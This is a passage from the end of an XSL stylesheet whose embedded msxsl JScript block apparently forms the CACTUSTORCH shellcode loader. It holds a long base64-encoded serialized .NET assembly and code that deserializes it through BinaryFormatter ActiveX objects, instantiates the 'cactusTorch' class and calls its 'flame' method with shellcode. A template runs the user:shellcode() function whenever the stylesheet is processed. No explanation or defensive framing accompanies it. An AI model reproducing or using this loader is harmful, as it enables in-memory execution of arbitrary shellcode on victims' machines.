159 |     "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"+
160 |     "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"+
161 |     "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"+
162 |     "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"+
163 |     "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"+
164 |     "AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"+
165 |     "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"+
166 |     "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"+
167 |     "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"+
168 |     "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"+
169 |     "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"+
170 |     "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"+
171 |     "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"+
172 |     "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+
173 |     "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+
174 |     "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+
175 |     "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+
176 |     "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+
177 |     "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+
178 |     "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+
179 |     "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+
180 |     "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+
181 |     "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+
182 |     "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+
183 |     "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+
184 |     "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+
185 |     "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+
186 |     "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+
187 |     "AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+
188 |     "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
189 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
190 |     "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
191 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
192 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
193 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
194 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
195 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
196 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
197 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
198 |     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
199 |     "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+
200 |     "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
201 |     var entry_class = 'cactusTorch';
202 | 
203 |     try {
204 |         setversion();
205 |         var stm = base64ToStream(serialized_obj);
206 |         var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
207 |         var al = new ActiveXObject('System.Collections.ArrayList');
208 |         var n = fmt.SurrogateSelector;
209 |         var d = fmt.Deserialize_2(stm);
210 |         al.Add(n);
211 |         var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
212 |         o.flame(binary,code);
213 |     } catch (e) {
214 |         debug(e.message);
215 |     }
216 | 
217 |     return 0;   
218 | }
219 | 
220 | </msxsl:script>
221 | <xsl:template match="/">
222 |    <xsl:value-of select="user:shellcode()"/>
223 | </xsl:template>
224 | </xsl:stylesheet>


--------------------------------------------------------------------------------